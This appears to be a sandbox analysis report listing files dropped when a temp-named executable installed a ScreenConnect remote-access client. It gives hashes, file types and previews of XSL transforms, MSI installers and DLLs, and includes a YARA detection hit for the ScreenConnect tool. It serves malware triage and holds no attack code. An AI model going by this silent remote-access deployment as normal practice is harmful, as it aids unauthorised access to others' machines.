SSDEEP:	48:6al5t7Bh14CGwFTwGqwFdwwA14XFUjF4OSMS5+ZL+FKwsiMS6g/VMS5JtD9FmoG6:6dQmN6MSzOE9FEFWFqFWcNH0eSYIZj
MD5:	8BD7F5FAA7C10C7BD3DADF217622D3C5
SHA1:	DEDA0F0C8521A9D6F94F76C528249504E0EE1FB9
SHA-256:	378CA2D1E4663403C3C43F1A4928821D9E6CF10BE535C084A23FF5B54C3B72DD
SHA-512:	0681765200BD3E5DFA81C0F2BBD156CFA70B91433DDA02F1DB0F440CB697E6399C3177B821CE62535003E9E3849D5B695E4DCAB6593CAFC70E673EEF99D2ACB5
Malicious:	false
Preview:	<xsl:stylesheet version="2.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform" ...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...exclude-result-prefixes="msxsl"..>...<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@"/>....</xsl:copy>...</xsl:template>.....<xsl:variable name="EnableGuestRequireConsentToggle" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='EnableGuestRequireConsentToggle']" />...<xsl:variable name="SupportLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='SupportLockMachineOnDisconnect']" />...<xsl:variable name="AccessLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='AccessLockMachineOnDisconnect']" />...<xsl:variable name="SupportLockMachine

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\TransformClientOverrideResx.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1135
Entropy (8bit):	5.055198370362517
Encrypted:	false
SSDEEP:	24:3qae8NW+OOt69ta9DAa9DtPMwrDAiFGrZs1BEU/q5rM/+01j:3qae8NW6SubtzAiFGrZC+IYrRqj
MD5:	7F75CED83D8C263A88A622A1E089B902
SHA1:	4C14858C78B556A0D1A02D596F74059944AE7865
SHA-256:	115937C6A57BFC17E1F9EA92C0C146DB44C803A449207FC77DD53CB0824DAA29
SHA-512:	C813C1D990DDAFE9B1A441791870A7238673E9CBA25CC044A6679EC2707323E3B91AEC6DE7CC14E434297B10DC33987D3C1FD7FDB2F742370F272C80FC01DA4C
Malicious:	false
Preview:	.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" exclude-result-prefixes="msxsl">..<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:template match="/root">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />.....<xsl:if test="count(data[@name='ApplicationDirectoryName']) = 0 and count(data[@name='ApplicationTitle']) > 0" xml:space="preserve"> <data name="ApplicationDirectoryName" xml:space="preserve">.. <value><xsl:value-of select="data[@name='ApplicationTitle']/value" /></value>.. </data>..</xsl:if>....</xsl:copy>...</xsl:template>...<xsl:template match="/root//node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@*" />....</xsl:copy>...</xsl:template>... this should be handled with the updated xsl which accounts for missing input files -->... we originally took this out because the Xsl.exe was updated to handle missing files but it seems like we still need t

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\TransformLicenseXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1768
Entropy (8bit):	5.101132156143849
Encrypted:	false
SSDEEP:	48:3qagl80iEFFrbb2FbZb0FbfeAPd5p+3FsJvP95vJ2rFuFnrRPOQR:aji3ALemVP95vH9
MD5:	258C82001204536C091D6ABF60724339
SHA1:	1C71A8427C60C962D655AD5199F1D68A049EE549
SHA-256:	C7EA7315ED86E55D841CE665C02D119D1F054F810BE7EE346A268E10F5826957
SHA-512:	3A6187B53319D096915CAACE9D65F9D40CA04EB274849D8EB4C934FF709CD02E3912C6D22AE5695B9B25FD23C86D13C1B61BD39DCBCD0AF397988AF0393CA9D6
Malicious:	false
Preview:	.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:ScreenConnect" exclude-result-prefixes="msxsl user">...<xsl:param name="licenseSignatureKey" />...<xsl:param name="licenseID" />.....<msxsl:script language="C#" implements-prefix="user" xml:space="preserve">....<msxsl:assembly name="System.Configuration" />....<msxsl:assembly name="ScreenConnect.Windows" />....<msxsl:assembly name="ScreenConnect.Server" />....<msxsl:assembly name="ScreenConnect.Core" />....<msxsl:using namespace="ScreenConnect" />....<msxsl:using namespace="System.IO" />....<msxsl:using namespace="System.Xml.Serialization" />....<msxsl:using namespace="System.Text" />........public string GenerateLicenseXml(string licenseSignatureKey, string licenseID)....{.....var license = new CloudLicense { LicenseID = licenseID };.......var envelope = new LicenseEnvelope { Contents = license };.....envelope.Sign(Convert.FromBase64String(lice

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\TransformOverriddenKeys.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	629
Entropy (8bit):	5.130173870130788
Encrypted:	false
SSDEEP:	12:yhkVRoUFLjco4IMs/XCZsDJMtR99oRXbHmiioRXbHmiHIfISdXt:KKer7n9AHvHjSXv
MD5:	31908D4B70E384C9F4D42CB05A28A73C
SHA1:	7A69055E9EB8E482C009F12CF5E555585531663B
SHA-256:	3D8138FDD91F148DE65DC062A9A4BD9781449B5D8C526157C61A04BFD86255F2
SHA-512:	ED993EB8848E144085D9335D82CBC6DFE940F6649C972EC173883486899186E94EF69992457A221B37F9BE3934B629EE7F7965C2D7C671B97DB210AC060FD589
Malicious:	false
Preview:	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">...<xsl:param name="baseFilePath" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>.....<xsl:template match="/root/data">....<xsl:if test="count(document($baseFilePath)/root/data[@name = current()/@name]) != 0 and document($baseFilePath)/root/data[@name = current()/@name]/value != current()/value">.....<xsl:copy>......<xsl:apply-templates select="node()\|@*" />.....</xsl:copy>....</xsl:if>...</xsl:template>..</xsl:stylesheet>..

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\TransformRoleXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5837
Entropy (8bit):	5.223683802415461
Encrypted:	false
SSDEEP:	48:3RW/8dr71427K9y+mXrlREtoO8gSs0e2tx4u/h0MrlGEsoi3itx4u/h0frlyEBFC:hWW0wtGtUpe2nhbjsvynhaHBGnhMBbZY
MD5:	144ADC93F53E457A1BFFA5372FD3C09B
SHA1:	6B19BB56C3C2F6E761D16D42112B57BD5E50D49E
SHA-256:	D467FE93A43F887F3F5440F9C9B9C66739DF8C064FA6A467AA102123EEDBEB4B
SHA-512:	08CA5D41C46CCD09F7FDE4EE325A38F0AE215AD9003CC9F0AF2B70AD59AC0A9995217EAC6A749E0BCFCE24AA23C0F106A42F6C4D1D367FD82429BCE4468B7487
Malicious:	false
Preview:	.<xsl:stylesheet.version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="[not(text()) and not()]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="PermissionEntry[@OwnershipFilter!='OwnedAndUnowned' and @AccessControlType!='Deny']" />.....<xsl:template match="@xsi:type[.='SessionOwnershipPermissionEntry']">....<xsl:attribute name="xsi:type">SessionPermissionEntry</xsl:attribute>...</xsl:template>.....<xsl:template match="@OwnershipFilter" />.....<xsl:template match="@Name[.='EndSession']">....<xsl:attribute name="Name">DeleteSession</xs

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\TransformSecurityEventTriggerXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	741
Entropy (8bit):	5.169072715134804
Encrypted:	false
SSDEEP:	12:yJ6Va8io1rO4ej+QhFLjco4IMs/XCZFr5CyWi7s/XCZDSbn:xa8ZrO4ej+4er7ftC127N8n
MD5:	41DFF6114A921D7AC5637B8AC9F04DC4
SHA1:	03880D70FA6A268C040025E90BC767D572BA36A0
SHA-256:	2CEFD9DB01C7A6F8E33A7DADBF511E963E56FF87D18064BAB2E4FE2D00A95797
SHA-512:	FE12502B10B35EF09837A8DE8CC1D7A0A67AAFBEBAF2E6911302D3E4C2F0379DFFF41B476ECBED04F24083F4B80C779F6CD19CB69633C0D6C8A3CE27ABD78958
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="[not(text()) and not()]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>..... no actual transforms for now -->....</xsl:stylesheet>..

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\TransformSessionEventTriggerXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with very long lines (14704), with CRLF line terminators
Category:	dropped
Size (bytes):	165735
Entropy (8bit):	4.0957845053651
Encrypted:	false
SSDEEP:	768:+aOZY/q3nv4eEPg8YFNHo9GHVIO35EiOGielK2pY/q3nv4eEPg8YFNHo9GHVI+3F:+aJ/CnQehCGHVt43/CnQehCGHVf1
MD5:	4D5B6FB68883C7842D5397D54E85ABC2
SHA1:	02DC58F27E440F02B5FC4872083C7DAFD2DD98C0
SHA-256:	6224B2FE77D2D9104E1BF79573CE1849C408744278DEEB198622FB28E46D80CE
SHA-512:	9398B8A85DD3B22B0F48AB05B8C9FF34C0B087BF49DF82320D93D1D52D4E26533A0EFA1BF0696DE4052A33AF0BAC824CC8A1F5998EEB5D25E438F9E4110622EF
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />...<xsl:variable name="singleQuote">'</xsl:variable>.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />....<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\TransformSessionGroupXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1564
Entropy (8bit):	5.254408929629647
Encrypted:	false
SSDEEP:	24:xa8gaRs7rO4ej+HLSEWucLxjUbNtBUU/Der7ftC127vwKwNwwkFEphRynS2n:E8gaRsTtogYq6r71427IbNxkFDSq
MD5:	26E0BFF9194950526A0BA294210BAF79
SHA1:	026D99742D35B1ECCB0DF29ECDA19CECE0387C88
SHA-256:	248DCA9B0706E95A2CBE18B4959ECCA5DFA2D4A77AADC66BF7BA9734757EF29C
SHA-512:	A3B29F916B29FE84DA5B4A9FB74BBCCB04781A0021C7C9EE4195D5D8024B9A5A7C64CDEF9AA98E10F1E68060E29E74677CD43002086FD76F3BAEB69B2147715B
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />..<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()\|@">....<xsl:copy>.....<xsl:apply-templates select="node()\|@" />....</xsl:copy>...</xsl:template>..... identity transform for sel

C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\TransformWebConfig.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Algol 68 source, ASCII text, with very long lines (1649), with CRLF line terminators
Category:	dropped
Size (bytes):	42037
Entropy (8bit):	5.478811092639316
Encrypted:	false
SSDEEP:	768:E1YNsh5xxCuEfxBDyp818n4SIOaUUX4bwsfVdfdFNvwDxjLVO88RlUEjKRMX9HPk:E1VCuEfxBDyp818n4SPaUUIbwsfVdfdA
MD5:	3E2819DAE208FB16B35E83522C9E1E21
SHA1:	325D9AB2122FF9B41AE936326CD23A0CBCCD16BE
SHA-256:	6B93D87A6547CEDD4EE11EB7E9373963B89F98536A7F834D4564977306021554
SHA-512:	6D5388F35C0958ACE0EAFDF8E98A3125D2535AC25670C0E13EED6664E9D97B6B2ED48889FD07CE9B74C0E8923C0BB796C537B0F4EB5C76A85B1E24474367ED6F
Malicious:	false
Preview:	<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:strip-space elements="add remove httpRuntime" />...<xsl:param name="configuration" />...<xsl:param name="platform" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="version" />...<xsl:param name="utcOffsetMinuteCount" />..... NOTE: this only supports C# 2.0 and .NET Framework 2.0-->... Custom/XslScratchpad is setup with the same C#/.NET configuration to provide full IDE support, so changes should be made/tested there and then copied to this section -->...<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Collections.Generic" />....<msxsl:using namespace="System.Security.Crypto

C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi

Process:	C:\Users\user\Desktop\tmpzNIZ0YQ.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BF3035CA-924F-7DEB-610F-14962D2B8EE2}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	13860864
Entropy (8bit):	7.9690051089460985
Encrypted:	false
SSDEEP:	196608:7Zs6Uruc9XbAZs6UYZs6UnZs6UeZs6UvlZs6UvWZs6UvD:7nCtxbAntnEnxn4n1nI
MD5:	896E1759C963366206827870323F8891
SHA1:	7EED7FC0CB4A002DA84EE06EFAA45404AE0623C0
SHA-256:	AC1A559C51DD453DA381CF30691E255EAA103AAC6A97134188F0A7779D815345
SHA-512:	27EB34C2485C4225AE4F329FC7045E795BA0DED74AB22EA008E9C64BD509667DCF10DE30E7760BD40A26A0C8C1B9005AD53F6E7E721EF06512AD781156E65D69
Malicious:	false
Preview:	......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\418a03.msi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BF3035CA-924F-7DEB-610F-14962D2B8EE2}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	13860864
Entropy (8bit):	7.9690051089460985
Encrypted:	false
SSDEEP:	196608:7Zs6Uruc9XbAZs6UYZs6UnZs6UeZs6UvlZs6UvWZs6UvD:7nCtxbAntnEnxn4n1nI
MD5:	896E1759C963366206827870323F8891
SHA1:	7EED7FC0CB4A002DA84EE06EFAA45404AE0623C0
SHA-256:	AC1A559C51DD453DA381CF30691E255EAA103AAC6A97134188F0A7779D815345
SHA-512:	27EB34C2485C4225AE4F329FC7045E795BA0DED74AB22EA008E9C64BD509667DCF10DE30E7760BD40A26A0C8C1B9005AD53F6E7E721EF06512AD781156E65D69
Malicious:	false
Preview:	......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\418a05.msi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BF3035CA-924F-7DEB-610F-14962D2B8EE2}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
Category:	dropped
Size (bytes):	13860864
Entropy (8bit):	7.9690051089460985
Encrypted:	false
SSDEEP:	196608:7Zs6Uruc9XbAZs6UYZs6UnZs6UeZs6UvlZs6UvWZs6UvD:7nCtxbAntnEnxn4n1nI
MD5:	896E1759C963366206827870323F8891
SHA1:	7EED7FC0CB4A002DA84EE06EFAA45404AE0623C0
SHA-256:	AC1A559C51DD453DA381CF30691E255EAA103AAC6A97134188F0A7779D815345
SHA-512:	27EB34C2485C4225AE4F329FC7045E795BA0DED74AB22EA008E9C64BD509667DCF10DE30E7760BD40A26A0C8C1B9005AD53F6E7E721EF06512AD781156E65D69
Malicious:	false
Preview:	......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI8E59.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	423852
Entropy (8bit):	6.576883630545913
Encrypted:	false
SSDEEP:	6144:EuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvM:EuH2anwohwQUv5uH2anwohwQUvM
MD5:	4CA4A0FAB7B33131CE50D4B3D071DC97
SHA1:	722FF44CA9527E738FDA732C19E905E6D4A24CE0
SHA-256:	6947D1DD7598ADEC2D1FD5395765AB8EC7B6D6F30428526739CBABDE3137425B
SHA-512:	EEEAF046DCDCD99597C09711837D06A6D9D1549F222E02FE11CF5B3FE9EE9844BC649F59A17C504357393F4F495ED9B855A8477808D151CC606C060024DA7673
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI8E59.tmp, Author: Joe Security
Preview:	...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}^.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}f.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}c.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.@.......@.

C:\Windows\Installer\MSI9148.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.573348437503042
Encrypted:	false
SSDEEP:	3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
MD5:	BA84DD4E0C1408828CCC1DE09F585EDA
SHA1:	E8E10065D479F8F591B9885EA8487BC673301298
SHA-256:	3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
SHA-512:	7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../....../......./......./.....n./...../../.../....../....../..-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI934C.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	207360
Entropy (8bit):	6.573348437503042
Encrypted:	false
SSDEEP:	3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
MD5:	BA84DD4E0C1408828CCC1DE09F585EDA
SHA1:	E8E10065D479F8F591B9885EA8487BC673301298
SHA-256:	3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
SHA-512:	7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../....../......./......./.....n./...../../.../....../....../..-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\Installer\SourceHash{BF3035CA-924F-7DEB-610F-14962D2B8EE2}

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1616720321083702
Encrypted:	false
SSDEEP:	12:JSbX72FjiTSAGiLIlHVRpMh/7777777777777777777777777vDHFbf27Dlp3XlN:JYTSQI5cZ+Hb6F
MD5:	A366AA60383DA880BE9CB95CD844DFAB
SHA1:	2898DF6D1F2A4A1ACED43611D19118FCDE623517
SHA-256:	DA55C7DE9C17E56BD52356EC42D6ABAFF5F0963FB1E49B8DA9CF9E9BDBBED831
SHA-512:	ECEBBF5AD8F7FD713ADC43ACAFEA7B9E62E3916B0725297762265D47DE1FD9E5463F5B00B142A7B56F7E85A0ACAF0F90410C766CB63DA2557FB1A7DD7D73D0FD
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.7979120961169852
Encrypted:	false
SSDEEP:	48:s8PhxuRc06WX4MjT5q4/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgY8:Dhx18jTcCKpKfV0d6l/XtQopASfM4
MD5:	4CD514A5B548DAE443C6B01354E949BD
SHA1:	1F73C085AD8092FDB2D33924F5F18476DBB72A48
SHA-256:	446064E81894B3AAB928C5648C6897374A8C0F5EEA901350900227FC73D3F33D
SHA-512:	9B79C2F6D7C9345086A7DE8A54FEB04D81FB94E41B54F128438B1C09EA66BEA5AE2A00BB472A7D312A065382519097EBDAF354C442F9357735D3ED2D23A0BA6A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\{BF3035CA-924F-7DEB-610F-14962D2B8EE2}\DefaultIcon

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
Category:	dropped
Size (bytes):	435
Entropy (8bit):	5.289734780210945
Encrypted:	false
SSDEEP:	12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
MD5:	F34D51C3C14D1B4840AE9FF6B70B5D2F
SHA1:	C761D3EF26929F173CEB2F8E01C6748EE2249A8A
SHA-256:	0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
SHA-512:	D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
Malicious:	false
Preview:	..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360001
Entropy (8bit):	5.362956963290675
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaum:zTtbmkExhMJCIpET
MD5:	58AE9ED41EF51D16F007D2B958FBBB99
SHA1:	0E406ECE5CD5BFD18FC35E30A0AE8B018822CD11
SHA-256:	8F1B858B42EF4DDED391C126E24A35C61DDA9EA400A8C66B617EFCC92D5F566B
SHA-512:	1B69EF1488766D8273D207B4822390D2978D713905ADA1B1144CA9D34E23D96EE1971A35AD95EDA7EFC3D9DF726FB99ED2D2C1FCB1A4F1D6EFE9AD7FB074B7BB
Malicious:	false
